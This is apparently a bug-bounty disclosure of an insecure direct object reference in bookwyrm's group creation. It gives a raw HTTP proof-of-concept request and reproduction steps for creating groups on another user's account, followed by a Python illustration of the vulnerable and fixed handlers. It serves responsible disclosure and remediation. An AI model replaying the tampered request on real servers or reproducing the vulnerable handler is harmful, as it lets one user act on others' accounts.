IDOR when creating a group in bookwyrm-social/bookwyrm

Valid

Reported on Aug 2nd 2022


Description

An insecure direct object reference (IDOR) when creating a group allows one user to create a new group on behalf of another: the owner of the group is taken from the user field in the POST body rather than from the logged-in session.

Proof of Concept

POST /user/alizo@bookwyrm.social/groups HTTP/2
Host: bookwyrm.social
Cookie: csrftoken=; django_language=None; sessionid=
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://bookwyrm.social/user/alizo/groups
Content-Type: application/x-www-form-urlencoded
Content-Length: 137
Origin: https://bookwyrm.social
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

csrfmiddlewaretoken=token&user=victim'suserid&name=idor&description=idor&privacy=public

Steps to reproduce:

1. Log in with the user1 account, then go to the profile page.

2. Go to the groups tab and create a new group.

3. Intercept the request and, in the body, change the value of the user field from user1's id to user2's id, then forward the request.

4. You will see that the new group is created in user2's account instead of user1's.

Impact

This vulnerability allows a user to create a group on another user's account, breaking the application's ownership logic.
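As an added illustration, not bookwyrm's own code, the following hypothetical Python model contrasts a handler that trusts the posted user field (the bug above) with one that derives the owner from the authenticated session and refuses a mismatching field. In a Django view the same idea is to leave the owner out of the ModelForm's fields and assign it from request.user after form.save(commit=False); the Request, GroupStore and create_group_* names here are assumptions for the demonstration.

```python
from dataclasses import dataclass, field

@dataclass
class Request:
    """Hypothetical stand-in for a Django request: user_id from the session, post from the body."""
    user_id: int
    post: dict

@dataclass
class GroupStore:
    """Hypothetical stand-in for the Group table; each row records its owner in "user"."""
    groups: list = field(default_factory=list)

    def add(self, owner_id, name, description, privacy):
        group = {"id": len(self.groups) + 1, "user": owner_id, "name": name,
                 "description": description, "privacy": privacy}
        self.groups.append(group)
        return group

class PermissionDenied(Exception):
    """Stands in for django.core.exceptions.PermissionDenied (rendered as HTTP 403)."""

def create_group_vulnerable(request, store):
    """IDOR: the group owner is taken from the client-controlled `user` body field."""
    body = request.post
    return store.add(int(body["user"]), body["name"], body["description"], body["privacy"])

def create_group_fixed(request, store):
    """The owner is always the authenticated user; a mismatching `user` field is refused."""
    body = request.post
    posted_owner = body.get("user")
    if posted_owner is not None and int(posted_owner) != request.user_id:
        # A legitimate browser form only ever posts the logged-in user's own id.
        raise PermissionDenied("cannot create a group on behalf of another user")
    return store.add(request.user_id, body["name"], body["description"], body["privacy"])

def demo():
    """Replays the report with constructed data: user1 (id 1) submits user2's id (2) as owner."""
    tampered = Request(user_id=1, post={"user": "2", "name": "idor",
                                         "description": "idor", "privacy": "public"})
    vulnerable_owner = create_group_vulnerable(tampered, GroupStore())["user"]
    try:
        create_group_fixed(tampered, GroupStore())
        fixed_result = "created"
    except PermissionDenied:
        fixed_result = "denied"
    return vulnerable_owner, fixed_result
```

Logging the PermissionDenied case server-side gives a useful detection signal, since a browser-submitted form never produces an owner mismatch on its own.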

We are processing your report and will contact the bookwyrm-social/bookwyrm team within 24 hours. 2 months ago
We have contacted a member of the bookwyrm-social/bookwyrm team and are waiting to hear back 2 months ago
Mouse Reeve validated this vulnerability 2 months ago
Distorted_Hacker has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Mouse Reeve confirmed that a fix has been merged on e5611c 2 months ago
The fix bounty has been dropped